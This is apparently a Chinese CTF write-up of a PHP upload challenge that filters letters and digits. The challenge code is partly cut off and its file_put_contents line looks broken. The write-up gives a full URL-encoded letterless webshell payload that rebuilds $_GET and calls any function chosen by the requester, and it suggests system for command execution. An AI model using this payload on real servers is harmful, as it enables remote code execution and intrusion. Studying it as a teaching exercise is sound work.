0x01 题目
', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '\\', '^', '`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '|', '~');
foreach ($black_list as $b) {
if (stripos($data, $b) !== false){
die("WAF!");
}
}
$filename=rand_string(0x20).'.php';
$folder='uploads/';
$full_filename = $folder.$filename;
if(file_put_contents($full_filename, 'WebShell";
echo "Enjoy your webshell~";
}else{
echo "Some thing wrong...";
}
0x02 解题
通读代码,发现这题是一个可以在文件后缀名写入shell的题,但是需要绕过黑名单。看一下黑名单发现数字、字符、还有一些常见的字符都被过滤掉了,所以需要写一个没有字母、数字的webshell。
由于加号在地址栏里会被解析成空格,因此需要进行一次url编码,得到payload
?c=%24_%3D%5B%5D.%5B%5D%3B%24_%3D%24_%5B%27%27%5D%3B%24__%3D%27%27%3B%24__.%3D%27_%27%3B%24___%3D%24_%3B%24___%2b%2b%3B%24___%2b%2b%3B%24___%2b%2b%3B%24___%2b%2b%3B%24___%2b%2b%3B%24___%2b%2b%3B%24__.%3D%24___%3B%24____%3D%24_%3B%24____%2b%2b%3B%24____%2b%2b%3B%24____%2b%2b%3B%24____%2b%2b%3B%24__.%3D%24____%3B%24_____%3D%24_%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24_____%2b%2b%3B%24__.%3D%24_____%3B%24%7B%24__%7D%5B_%5D%28%24%7B%24__%7D%5B__%5D%29%3B
成功~~~
可以用system函数试一试~
